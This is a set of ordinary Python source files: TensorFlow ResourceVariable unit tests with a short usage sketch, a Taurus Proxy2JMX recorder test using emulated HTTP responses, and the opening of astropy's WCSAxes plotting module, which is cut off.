assert_eq(var.scatter_add(slices).scatter_min(slices), [3., 2.])
assert_eq(var.scatter_mul(slices).scatter_mul(slices), [3., 8.])
assert_eq(var.scatter_div(slices).scatter_div(slices), [3., 2.])
assert_eq(
var.scatter_nd_update([[1]], [4.]).scatter_nd_add([[0]], [2.])
.scatter_nd_sub([[1]], [3]),
[5., 1.])
assert_eq(var, [5., 1.])
batch_var = resource_variable_ops.ResourceVariable(array_ops.ones((2, 2)))
self.evaluate(variables.global_variables_initializer())
batch_slices1 = indexed_slices.IndexedSlices(
indices=[[1], [0]], values=[[2], [2]])
batch_slices2 = indexed_slices.IndexedSlices(
indices=[[1], [1]], values=[[3], [3]])
assert_eq(
batch_var.batch_scatter_update(batch_slices1)
.batch_scatter_update(batch_slices2),
[[1, 3], [2, 3]])
@test_util.run_in_graph_and_eager_modes
def testInitValueWrongShape(self):
with self.assertRaisesWithPredicateMatch(
ValueError, r"not compatible with"):
var = resource_variable_ops.ResourceVariable(
initial_value=np.zeros(shape=[3]),
shape=[4])
self.evaluate(variables.global_variables_initializer())
self.evaluate(var.read_value())
@test_util.run_deprecated_v1
def testDtypeAfterFromProto(self):
v = resource_variable_ops.ResourceVariable(2.0)
w = resource_variable_ops.ResourceVariable.from_proto(v.to_proto())
self.assertIsInstance(w.dtype, dtypes.DType)
self.assertEqual(v.dtype, w.dtype)
# TODO(alive): get caching to work in eager mode.
@test_util.run_deprecated_v1
def testCachingDevice(self):
with ops.device("/job:server/task:1"):
v = resource_variable_ops.ResourceVariable(
2.0, caching_device="/job:localhost")
self.assertEqual("/job:localhost", v.value().device)
with self.assertRaises(ValueError):
_ = v.value().op.get_attr("_class")
with ops.colocate_with(v.op):
w = resource_variable_ops.ResourceVariable(
2.0, caching_device="/job:localhost")
self.assertEqual("/job:localhost", w.value().device)
with self.assertRaises(ValueError):
_ = w.value().op.get_attr("_class")
@test_util.run_deprecated_v1
def testSharedName(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(300.0, name="var4")
self.evaluate(variables.global_variables_initializer())
w = _eager_safe_var_handle_op(
dtype=v.dtype.base_dtype,
shape=v.get_shape(),
shared_name="var4",
# Needed in Eager since we get a unique container name by default.
container=ops.get_default_graph()._container)
w_read = resource_variable_ops.read_variable_op(w, v.dtype.base_dtype)
self.assertEqual(300.0, self.evaluate(w_read))
x = _eager_safe_var_handle_op(
dtype=v.dtype.base_dtype,
shape=v.get_shape(),
shared_name="var5",
container=ops.get_default_graph()._container)
with self.assertRaisesOpError(
"(Resource .*/var5/.* does not exist|uninitialized)"):
resource_variable_ops.read_variable_op(x, v.dtype.base_dtype).eval()
@test_util.run_deprecated_v1
def testSharedNameWithNamescope(self):
with self.cached_session():
with ops.name_scope("foo"):
v = resource_variable_ops.ResourceVariable(300.0, name="var6")
self.assertEqual("foo/var6", v._shared_name) # pylint: disable=protected-access
self.assertEqual("foo/var6:0", v.name)
self.evaluate(variables.global_variables_initializer())
w = _eager_safe_var_handle_op(
dtype=v.dtype.base_dtype,
shape=v.get_shape(),
shared_name="foo/var6",
# Needed in Eager since we get a unique container name by default.
container=ops.get_default_graph()._container)
w_read = resource_variable_ops.read_variable_op(w, v.dtype.base_dtype)
self.assertEqual(300.0, self.evaluate(w_read))
@test_util.run_in_graph_and_eager_modes
def testShape(self):
v = resource_variable_ops.ResourceVariable(
name="var4", initial_value=array_ops.ones(shape=[10, 20, 35]))
self.assertEqual("(10, 20, 35)", str(v.shape))
self.assertEqual("(10, 20, 35)", str(v.get_shape()))
self.assertEqual("(10, 20, 35)", str(v.value().shape))
self.assertEqual("(3, 20, 35)", str(v.sparse_read([0, 1, 2]).shape))
if not context.executing_eagerly():
self.assertEqual(
"<unknown>",
str(v.sparse_read(array_ops.placeholder(dtypes.int32)).shape))
@test_util.run_deprecated_v1
def testSetInitialValue(self):
with self.cached_session():
# Initialize variable with a value different from the initial value passed
# in the constructor.
v = resource_variable_ops.ResourceVariable(2.0)
v.initializer.run(feed_dict={v.initial_value: 3.0})
self.assertEqual(3.0, v.value().eval())
@test_util.run_v1_only("b/120545219")
def testControlFlowInitialization(self):
"""Expects an error if an initializer is in a control-flow scope."""
def cond(i, _):
return i < 10
def body(i, _):
zero = array_ops.zeros([], dtype=dtypes.int32)
v = resource_variable_ops.ResourceVariable(initial_value=zero)
return (i + 1, v.read_value())
with self.assertRaisesRegex(ValueError, "initial_value"):
control_flow_ops.while_loop(cond, body, [0, 0])
def testVariableEager(self):
with context.eager_mode():
init = array_ops.ones(shape=[10, 20, 35], dtype=dtypes.int32)
constraint = lambda x: x
with ops.name_scope("foo", skip_on_eager=False):
v = resource_variable_ops.ResourceVariable(
name="var7",
initial_value=init,
caching_device="cpu:0",
constraint=constraint)
# Test properties
self.assertEqual(dtypes.int32, v.dtype)
self.assertEqual("foo/var7:0", v.name)
self.assertAllEqual([10, 20, 35], v.shape.as_list())
self.assertIsInstance(v.handle, ops.EagerTensor)
self.assertEqual(constraint, v.constraint)
self.assertAllEqual(init.numpy(), v.read_value().numpy())
self.assertAllEqual(init.numpy(), v.value().numpy())
# Callable init.
callable_init = lambda: init * 2
v2 = resource_variable_ops.ResourceVariable(
initial_value=callable_init, name="var7")
self.assertEqual("var7:0", v2.name)
self.assertAllEqual(2 * init.numpy(), v2.read_value().numpy())
# Test assign_add.
new_v2_val = v2.assign_add(v.read_value())
self.assertAllEqual(v.read_value().numpy() * 3, new_v2_val.numpy())
# Test assign_sub.
new_v2_val = v2.assign_sub(v.read_value())
self.assertAllEqual(v.read_value().numpy() * 2, new_v2_val.numpy())
# Test assign.
v2.assign(v.read_value())
self.assertAllEqual(v.read_value().numpy(), v2.read_value().numpy())
# Test load
v2.load(2 * v.read_value())
self.assertAllEqual(2 * v.read_value().numpy(), v2.read_value().numpy())
# Test convert_to_tensor
t = ops.convert_to_tensor(v)
self.assertAllEqual(t.numpy(), v.read_value().numpy())
# Test operations
self.assertAllEqual((v * 2).numpy(), (v + v).numpy())
def testNumpyDotArray(self):
with context.eager_mode():
# Scalars use a separate code path.
v1 = resource_variable_ops.ResourceVariable(initial_value=lambda: 1,
name="v1")
self.assertEqual(1, np.array(v1))
v2 = resource_variable_ops.ResourceVariable(initial_value=lambda: [1, 2],
name="v2")
self.assertAllEqual(v2.read_value().numpy(), np.array(v2))
self.assertAllEqual([1, 2], np.array(v2))
def testContainerEager(self):
with context.eager_mode():
v1 = resource_variable_ops.ResourceVariable(initial_value=lambda: 1,
name="same")
with ops.container("different"):
v2 = resource_variable_ops.ResourceVariable(initial_value=lambda: 0,
name="same")
v2.assign(2)
self.assertEqual(1, v1.read_value().numpy())
self.assertEqual(2, v2.read_value().numpy())
def testDestruction(self):
with context.eager_mode():
var = resource_variable_ops.ResourceVariable(initial_value=1.0,
name="var8")
var_handle = test_ops.make_weak_resource_handle(var._handle)
del var
with self.assertRaisesRegex(errors.NotFoundError,
r"Resource .* does not exist."):
resource_variable_ops.destroy_resource_op(var_handle,
ignore_lookup_error=False)
def testScatterUpdate(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="update")
state_ops.scatter_update(v, [1], [3.0])
self.assertAllEqual([1.0, 3.0], v.numpy())
def testScatterAddStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="add")
state_ops.scatter_add(v, [1], [3])
self.assertAllEqual([1.0, 5.0], v.numpy())
def testScatterSubStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="sub")
state_ops.scatter_sub(v, [1], [3])
self.assertAllEqual([1.0, -1.0], v.numpy())
def testScatterUpdateVariant(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([
list_ops.empty_tensor_list(
element_dtype=dtypes.float32, element_shape=[])
])
v.scatter_update(
indexed_slices.IndexedSlices(
list_ops.tensor_list_from_tensor([1., 2.], element_shape=[]), 0))
self.assertAllEqual(
list_ops.tensor_list_get_item(v[0], 0, element_dtype=dtypes.float32),
1.)
def testGroupDoesntForceRead(self):
with ops.Graph().as_default():
v = resource_variable_ops.ResourceVariable(1.0)
assign = v.assign_add(1.0)
g = control_flow_ops.group([assign])
self.assertEqual(g.control_inputs[0].type, "AssignAddVariableOp")
def testScatterNdAddStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(
[1, 2, 3, 4, 5, 6, 7, 8], dtype=dtypes.float32, name="add")
indices = constant_op.constant([[4], [3], [1], [7]], dtype=dtypes.int32)
updates = constant_op.constant([9, 10, 11, 12], dtype=dtypes.float32)
expected = np.array([1, 13, 3, 14, 14, 6, 7, 20])
state_ops.scatter_nd_add(v, indices, updates)
self.assertAllClose(expected, v.numpy())
@test_util.run_in_graph_and_eager_modes
def testUnreadVariableInsideFunction(self):
v = resource_variable_ops.ResourceVariable(1.0)
@def_function.function
def assign():
v.assign(1.0)
graph = assign.get_concrete_function().graph
self.assertTrue(all(x.type != "ReadVariableOp"
for x in graph.get_operations()))
def testScatterNdSubStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(
[1, 2, 3, 4, 5, 6, 7, 8], dtype=dtypes.float32, name="sub")
indices = constant_op.constant([[4], [3], [1], [7]], dtype=dtypes.int32)
updates = constant_op.constant([9, 10, 11, 12], dtype=dtypes.float32)
expected = np.array([1, -9, 3, -6, -4, 6, 7, -4])
state_ops.scatter_nd_sub(v, indices, updates)
self.assertAllClose(expected, v.numpy())
def testScatterUpdateCast(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="update")
state_ops.scatter_update(v, [1], [3])
self.assertAllEqual([1.0, 3.0], v.numpy())
@test_util.run_in_graph_and_eager_modes
def testScatterUpdateInvalidArgs(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3], name="update")
# The exact error and message differ between graph construction (where the
# error is realized during shape inference at graph construction time),
# eager execution (where the error is realized during kernel execution),
# and XLA auto-clustering execution (where the error is realized in the xla
# op kernel) which is triggered when running in eager op as function mode.
with self.assertRaisesRegex(Exception, r"shape.*2.*3|RET_CHECK failure"):
state_ops.scatter_update(v, [0, 1], [0, 1, 2])
@test_util.disable_xla("b/208334252") # XLA doesn't have a deterministic impl
def testScatterAddDeterministic(self):
with context.eager_mode(), test_util.deterministic_ops():
# Normally a nondeterministic codepath occurs when the variable has at
# least 1024 elements. Test that op determinism ensures the op is
      # deterministic.
v = resource_variable_ops.ResourceVariable(array_ops.zeros([1024]))
delta = ops.IndexedSlices(
values=np.random.normal(size=(1_000_000,)),
indices=array_ops.zeros((1_000_000,), dtype=np.int32),
dense_shape=(1024,))
v.scatter_add(delta)
for _ in range(5):
v2 = resource_variable_ops.ResourceVariable(array_ops.zeros([1024]))
v2.scatter_add(delta)
self.assertAllEqual(v, v2)
@test_util.run_in_graph_and_eager_modes
def testAssignIncompatibleShape(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3])
self.evaluate(v.initializer)
pattern = re.compile("shapes must be equal", re.IGNORECASE)
with self.assertRaisesRegex(Exception, pattern):
self.evaluate(v.assign_add(1))
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testCopyToGraphUninitialized(self):
v = resource_variable_ops.ResourceVariable([0, 1, 2, 3])
copy_to_graph = ops.Graph()
with copy_to_graph.as_default(): # Intentionally testing v1 behavior
copied = resource_variable_ops.copy_to_graph_uninitialized(v)
self.assertEqual(v.name, copied.name)
self.assertIsNone(copied.initializer)
def create_variant_shape_and_type_data(self):
variant_shape_and_type_data = (
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData())
variant_shape_and_type_data.is_set = True
stored_shape = tensor_shape.TensorShape([None, 4]).as_proto()
stored_dtype = dtypes.float32.as_datatype_enum
# NOTE(ebrevdo): shape_and_type lacks append() in some versions of protobuf.
variant_shape_and_type_data.shape_and_type.extend([
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleShapeAndType(
shape=stored_shape,
dtype=stored_dtype,
type=full_type_pb2.FullTypeDef())
])
return variant_shape_and_type_data
@def_function.function
def create_constant_variant(self, value):
value = constant_op.constant(
tensor_pb2.TensorProto(
dtype=dtypes.variant.as_datatype_enum,
tensor_shape=tensor_shape.TensorShape([]).as_proto(),
variant_val=[
tensor_pb2.VariantTensorDataProto(
# Match registration in variant_op_registry.cc
type_name=b"int",
metadata=np.array(value, dtype=np.int32).tobytes())
]))
return value
# TODO(ebrevdo): Add run_in_graph_and_eager_modes once we can create
# EagerTensor constants with TensorProto inputs.
@test_util.disable_tfrt("Does not support tf.Const in lowering.")
@test_util.run_in_graph_and_eager_modes()
def testVariantInitializer(self):
variant_shape_and_type_data = self.create_variant_shape_and_type_data()
value = self.create_constant_variant(3)
initializer = array_ops.fill([3], value)
resource_variable_ops._set_handle_shapes_and_types( # pylint: disable=protected-access
initializer, variant_shape_and_type_data,
graph_mode=not context.executing_eagerly())
v = resource_variable_ops.ResourceVariable(initializer)
read = array_ops.identity(v)
read_variant_shape_and_type = (
resource_variable_ops.get_eager_safe_handle_data(read))
self.assertEqual(
read_variant_shape_and_type, variant_shape_and_type_data)
gather = v.sparse_read([0])
gather_variant_shape_and_type = (
resource_variable_ops.get_eager_safe_handle_data(gather))
self.assertEqual(
gather_variant_shape_and_type, variant_shape_and_type_data)
# Make sure initializer runs.
if not context.executing_eagerly():
self.evaluate(v.initializer)
self.evaluate(read.op)
self.evaluate(gather.op)
@parameterized.parameters([
# batch_dims=0 (equivalent to tf.gather)
dict( # 2D indices
batch_dims=0,
params=[6, 7, 8, 9],
indices=[[2, 1], [0, 3]],
expected=[[8, 7], [6, 9]]),
dict( # 3D indices
batch_dims=0,
params=[6, 7, 8, 9],
indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
expected=[[[9, 7], [8, 6]], [[6, 9], [8, 8]]]),
dict( # 4D indices
batch_dims=0,
params=[8, 9],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[8, 9], [9, 8]], [[8, 8], [9, 9]]],
[[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
# batch_dims=indices.shape.ndims - 1 (equivalent to
# tf.compat.v1.batch_gather)
dict( # 2D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[2, 1], [0, 3]],
expected=[[12, 11], [20, 23]]),
dict( # 3D indices (2 batch dims)
batch_dims=2,
params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
dict( # 2D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[2, 1], [0, 3]],
expected=[[12, 11], [20, 23]]),
dict( # 3D indices (2 batch dims)
batch_dims=2,
params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
# 0 < batch_dims < indices.shape.ndims - 1
dict( # 3D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
expected=[[[13, 11], [12, 10]], [[20, 23], [22, 22]]]),
dict( # 4D indices (1 batch dim)
batch_dims=1,
params=[[6, 7], [8, 9]],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[6, 7], [7, 6]], [[6, 6], [7, 7]]],
[[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
dict( # 4D indices (2 batch dims)
batch_dims=2,
params=[[[2, 3], [4, 5]], [[6, 7], [8, 9]]],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[2, 3], [3, 2]], [[4, 4], [5, 5]]],
[[[7, 7], [6, 6]], [[8, 9], [9, 8]]]]),
])
@test_util.run_in_graph_and_eager_modes
def testGatherWithBatchDims(self, params, indices, batch_dims, expected):
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=var.dtype, batch_dims=batch_dims)
self.assertAllEqual(expected, result)
@parameterized.parameters([
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=0,
output_shape=[2, 3, 8, 9, 10, 3, 4, 5, 6, 7]
# = indices.shape + params.shape[1:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=1,
output_shape=[2, 3, 8, 9, 10, 4, 5, 6, 7]
# = params.shape[:1] + indices.shape[1:] + params.shape[2:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
output_shape=[2, 3, 8, 9, 10, 5, 6, 7]
# = params.shape[:2] + indices.shape[2:] + params.shape[3:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 4, 9, 10],
batch_dims=3,
output_shape=[2, 3, 4, 9, 10, 6, 7]
# = params.shape[:3] + indices.shape[3:] + params.shape[4:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 4, 5, 10],
batch_dims=4,
output_shape=[2, 3, 4, 5, 10, 7]
# = params.shape[:4] + indices.shape[4:] + params.shape[5:]
),
])
@test_util.run_in_graph_and_eager_modes
def testGatherWithBatchDimsMatchesTensor(self, params_shape, indices_shape,
batch_dims, output_shape):
"""Checks that gather with batch_dims returns the correct shape."""
# Generate a `params` tensor with the indicated shape.
params_size = np.prod(params_shape)
params = np.reshape(np.arange(params_size, dtype=np.int32), params_shape)
# Generate an `indices` tensor with the indicated shape, where each index
# is within the appropriate range.
indices_size = np.prod(indices_shape)
indices = np.reshape(np.arange(indices_size, dtype=np.int32), indices_shape)
indices = indices % params_shape[batch_dims]
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
expected = array_ops.gather(
var.read_value(), indices, batch_dims=batch_dims)
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=var.dtype, batch_dims=batch_dims)
self.assertAllEqual(output_shape, result.shape.as_list())
self.assertAllEqual(expected, result)
@parameterized.parameters([
dict(dtype=dtypes.bool),
dict(dtype=dtypes.int64),
dict(dtype=dtypes.half),
dict(dtype=dtypes.float32),
dict(dtype=dtypes.double),
])
@test_util.run_gpu_only
@test_util.run_in_graph_and_eager_modes
def testGatherWithDTypes(self, dtype):
if dtype == dtypes.bool:
params = constant_op.constant([False, True, False, True])
expected = constant_op.constant([[False, True], [False, True]])
else:
params = constant_op.constant([6, 7, 8, 9], dtype=dtype)
expected = constant_op.constant([[8, 7], [6, 9]], dtype=dtype)
indices = constant_op.constant([[2, 1], [0, 3]])
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=dtype)
self.assertAllEqual(expected, result)
@test_util.run_v2_only
def testUninitializedVariableMemoryUsage(self):
if test_util.is_gpu_available():
# TODO(allenl): Investigate possible GPU-specific memory leaks
self.skipTest("Disabled when a GPU is available")
# TODO(kkb): Python memory checker complains continuous `weakref`
# allocations, investigate.
if memory_checker.CppMemoryChecker is None:
self.skipTest("Requires the C++ memory checker")
def _create_and_delete_variable():
resource_variable_ops.UninitializedVariable(
shape=[100, 100],
dtype=dtypes.float32)
_create_and_delete_variable()
checker = memory_checker.CppMemoryChecker(
"ResourceVariableOps.testUninitializedVariableMemoryUsage")
for _ in range(2):
_create_and_delete_variable()
checker.record_snapshot()
checker.stop()
checker.report()
checker.assert_no_leak_if_all_possibly_except_one()
@test_util.run_v2_only
def testIterateVariable(self):
v = variables.Variable([1., 2.])
self.assertAllClose([1., 2.], list(iter(v)))
if __name__ == "__main__":
test.main()
|
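# A minimal standalone sketch (not part of the test file above) showing, with
# the public TensorFlow 2.x API, the scatter and batched-gather semantics the
# tests exercise. This assumes eager execution; the variable names and values
# below are hypothetical.
import tensorflow as tf

v = tf.Variable([1., 2., 3., 4., 5., 6., 7., 8.])
indices = tf.constant([[4], [3], [1], [7]])
updates = tf.constant([9., 10., 11., 12.])
v.scatter_nd_add(indices, updates)
# Matches the expected array in testScatterNdAddStateOps:
# [1., 13., 3., 14., 14., 6., 7., 20.]
print(v.numpy())

# batch_dims gather: with batch_dims=1 each row of `row_indices` indexes only
# the corresponding row of `params`, as in testGatherWithBatchDims.
params = tf.constant([[10, 11, 12, 13], [20, 21, 22, 23]])
row_indices = tf.constant([[2, 1], [0, 3]])
print(tf.gather(params, row_indices, batch_dims=1).numpy())  # [[12 11] [20 23]]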
|
import json
import os
import shutil
from os.path import join
from bzt import TaurusConfigError
from bzt.modules.proxy2jmx import Proxy2JMX, BZAProxy
from bzt.modules._selenium import SeleniumExecutor
from bzt.utils import is_windows, is_linux, get_full_path, RESOURCES_DIR
from tests.unit import BZTestCase, EngineEmul
class BZAProxyEmul(BZAProxy):
def __init__(self, service):
super(BZAProxyEmul, self).__init__()
self.service = service
def _request(self, url, data=None, headers=None, method=None, raw_result=False):
self.log.debug("Emulating: %s", url)
response = self.service.responses.pop(0)
resp = response.text
self.log.debug("Result: %s", resp)
if raw_result:
return resp
else:
return json.loads(resp) if len(resp) else {}
class Proxy2JMXEmul(Proxy2JMX):
responses = []
def __init__(self):
super(Proxy2JMXEmul, self).__init__()
self.proxy = BZAProxyEmul(self)
class ResponseEmul(object):
def __init__(self, status_code, text):
self.status_code = status_code
self.text = text
class TestProxy2JMX(BZTestCase):
def setUp(self):
super(TestProxy2JMX, self).setUp()
self.obj = Proxy2JMXEmul()
self.obj.engine = EngineEmul()
src = join(RESOURCES_DIR, 'chrome-loader.c')
dst_loader = join(RESOURCES_DIR, 'chrome-loader.exe')
shutil.copy2(src, dst_loader)
def tearDown(self):
dst_loader = join(RESOURCES_DIR, 'chrome-loader.exe')
os.remove(dst_loader)
super(TestProxy2JMX, self).tearDown()
def test_no_token(self):
self.obj.settings = self.obj.engine.config.get('recorder')
self.assertRaises(TaurusConfigError, self.obj.prepare)
def test_full(self):
self.obj.api_delay = 1
self.obj.responses = [
ResponseEmul(200, '{"result" : {}}'),
ResponseEmul(200, '{"result" : {"port": "port1", "host": "host1"}}'),
ResponseEmul(200, ''),
ResponseEmul(200, ''), # startup: startRecording
ResponseEmul(200, ''), # shutdown: stopRecording
ResponseEmul(200, '{"result" : "http://jmx_url"}'),
ResponseEmul(200, 'regular jmx contents'),
ResponseEmul(200, '{"result" : "http://smartjmx_url"}'),
ResponseEmul(200, 'smartjmx content')]
self.obj.engine.config.merge({
'modules': {
'recorder': {
'token': '123'}}})
self.obj.settings = self.obj.engine.config.get('modules').get('recorder')
executor = SeleniumExecutor()
self.obj.engine.provisioning.executors = [executor]
self.obj.prepare()
self.assertEqual(self.obj.proxy_addr, 'http://host1:port1')
self.obj.startup()
self.obj.shutdown()
self.obj.post_process()
with open(self.obj.engine.artifacts_dir + '/generated.smart.jmx') as fd:
lines = fd.readlines()
self.assertEqual(len(lines), 1)
self.assertEqual(lines[0].strip(), 'smartjmx content')
with open(self.obj.engine.artifacts_dir + '/generated.simple.jmx') as fd:
lines = fd.readlines()
self.assertEqual(len(lines), 1)
self.assertEqual(lines[0].strip(), 'regular jmx contents')
def test_existing_proxy(self):
self.obj.api_delay = 1
self.obj.responses = [
ResponseEmul(200,
'{"result" : {"port": "port1", "host": "host1", "status": "active"}}'),
ResponseEmul(200, ''), # stopRecording
ResponseEmul(200, '')] # clearRecording
self.obj.engine.config.merge({
'modules': {
'recorder': {
'token': '123'}}})
self.obj.settings = self.obj.engine.config.get('modules').get('recorder')
self.obj.prepare()
self.assertEqual(self.obj.proxy_addr, 'http://host1:port1')
def test_filename(self):
self.obj.api_delay = 1
self.obj.responses = [
ResponseEmul(200,
'{"result" : {"port": "port1", "host": "host1", "status": "active"}}'),
ResponseEmul(200, '1'), # stopRecording
ResponseEmul(200, '2'), # clearRecording
ResponseEmul(200, '{"result" : "http://jmx_url"}'),
ResponseEmul(200, 'regular jmx contents'),
ResponseEmul(200, '{"result" : "http://smartjmx_url"}'),
ResponseEmul(200, 'smartjmx content')
]
self.obj.engine.config.merge({'modules': {'recorder': {'token': '123'}}})
self.obj.settings = self.obj.engine.config.get('modules').get('recorder')
self.obj.parameters['simple-output'] = self.obj.engine.artifacts_dir + '/simple.jmx'
self.obj.parameters['smart-output'] = self.obj.engine.artifacts_dir + '/smart.jmx'
self.obj.prepare()
self.obj.post_process()
self.assertTrue(os.path.exists(self.obj.engine.artifacts_dir + "/smart.jmx"))
self.assertTrue(os.path.exists(self.obj.engine.artifacts_dir + "/simple.jmx"))
def _check_linux(self):
required_env = {
'DESKTOP_SESSION': None, 'HTTP_PROXY': 'http://host1:port1', 'https_proxy': 'http://host1:port1',
'GNOME_DESKTOP_SESSION_ID': None, 'http_proxy': 'http://host1:port1', 'XDG_CURRENT_DESKTOP': None,
'HTTPS_PROXY': 'http://host1:port1', 'CHROMIUM_USER_FLAGS': '--proxy-server=http://host1:port1',
'KDE_FULL_SESSION': None}
self.obj.startup()
real_env = self.obj.engine.provisioning.executors[0].env.get()
for key in required_env:
if required_env[key] is None:
self.assertNotIn(key, real_env)
else:
self.assertIn(key, real_env)
self.assertEqual(required_env[key], real_env[key], key)
def _check_windows(self):
art_dir = self.obj.engine.artifacts_dir
os.environ['LOCALAPPDATA'] = art_dir
os.mkdir(join(art_dir, 'Chromium'))
os.mkdir(join(art_dir, 'Chromium', 'Application'))
os.mkdir(join(art_dir, 'chromedriver'))
src = join(RESOURCES_DIR, 'chrome-loader.c')
dst_chrome = join(art_dir, 'Chromium', 'Application', 'chrome.exe')
dst_chromedriver = join(art_dir, 'chromedriver', 'chromedriver.exe')
shutil.copy2(src, dst_chrome)
shutil.copy2(src, dst_chromedriver)
required_env = {
'PATH_TO_CHROME': dst_chrome,
'ADDITIONAL_CHROME_PARAMS': '--proxy-server="http://host1:port1"',
'CHROME_LOADER_LOG': join(self.obj.engine.artifacts_dir, 'chrome-loader.log')}
os.environ['PATH'] = join(art_dir, 'chromedriver') + os.pathsep + os.getenv('PATH')
self.obj.startup()
loader_dir = set(os.listdir(join(art_dir, 'chrome-loader')))
self.assertEqual(loader_dir, {'chrome.exe', 'chromedriver.exe'})
required_env = {str(key.upper()): str(required_env[key]) for key in required_env}
real_env = self.obj.engine.provisioning.executors[0].env.get()
real_env = {str(key.upper()): str(real_env[key]) for key in real_env}
self.assertTrue(real_env["PATH"].startswith(join(self.obj.engine.artifacts_dir, "chrome-loader")))
for key in required_env:
self.assertIn(key, real_env)
self.assertEqual(required_env[key], real_env[key])
def _check_mac(self):
self.obj.startup()
self.assertIn("Your system doesn't support settings of proxy", self.log_recorder.warn_buff.getvalue())
def test_chrome_proxy(self):
self.obj.responses = [
ResponseEmul(200, '{"result" : {}}'),
ResponseEmul(200, '{"result" : {"port": "port1", "host": "host1"}}'),
ResponseEmul(200, ''),
ResponseEmul(200, ''), # startup: startRecording
ResponseEmul(200, ''), # shutdown: stopRecording
ResponseEmul(200, '{"result" : "http://jmx_url"}'),
ResponseEmul(200, 'regular jmx contents'),
ResponseEmul(200, '{"result" : "http://smartjmx_url"}'),
ResponseEmul(200, 'smartjmx content')]
self.obj.engine.config.merge({
'modules': {
'recorder': {
'token': '123'}}})
self.obj.settings = self.obj.engine.config.get('modules').get('recorder')
self.sniff_log(self.obj.log)
executor = SeleniumExecutor()
self.obj.engine.provisioning.executors = [executor]
self.obj.prepare()
if is_linux():
self._check_linux()
elif is_windows():
self._check_windows()
else: # MacOS
self._check_mac()
self.obj.shutdown()
self.obj.post_process()
|
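# A framework-free sketch of the canned-response pattern used by BZAProxyEmul
# above: each emulated request pops the next prepared body from a FIFO queue
# and returns it raw or JSON-decoded. Class and URL names here are hypothetical.
import json


class FakeAPIClient:
    def __init__(self, responses):
        self.responses = list(responses)   # prepared response bodies, in order

    def request(self, url, raw_result=False):
        body = self.responses.pop(0)       # consume in FIFO order
        if raw_result:
            return body
        return json.loads(body) if body else {}


client = FakeAPIClient(['{"result": {"host": "host1", "port": "port1"}}', ''])
print(client.request("https://example.invalid/proxy"))  # decoded dict
print(client.request("https://example.invalid/stop"))   # empty body -> {}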
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from functools import partial
from collections import defaultdict
import numpy as np
from matplotlib import rcParams
from matplotlib.artist import Artist
from matplotlib.axes import Axes, subplot_class_factory
from matplotlib.transforms import Affine2D, Bbox, Transform
import astropy.units as u
from astropy.coordinates import SkyCoord, BaseCoordinateFrame
from astropy.wcs import WCS
from astropy.wcs.wcsapi import BaseHighLevelWCS
from .transforms import CoordinateTransform
from .coordinates_map import CoordinatesMap
from .utils import get_coord_meta, transform_contour_set_inplace
from .frame import RectangularFrame, RectangularFrame1D
from .wcsapi import IDENTITY, transform_coord_meta_from_wcs
__all__ = ['WCSAxes', 'WCSAxesSubplot']
VISUAL_PROPERTIES = ['facecolor', 'edgecolor', 'linewidth', 'alpha', 'linestyle']
class _WCSAxesArtist(Artist):
"""This is a dummy artist to enforce the correct z-order of axis ticks,
tick labels, and gridlines.
FIXME: This is a bit of a hack. ``Axes.draw`` sorts the artists by zorder
and then renders them in sequence. For normal Matplotlib axes, the ticks,
tick labels, and gridlines are included in this list of artists and hence
are automatically drawn in the correct order. However, ``WCSAxes`` disables
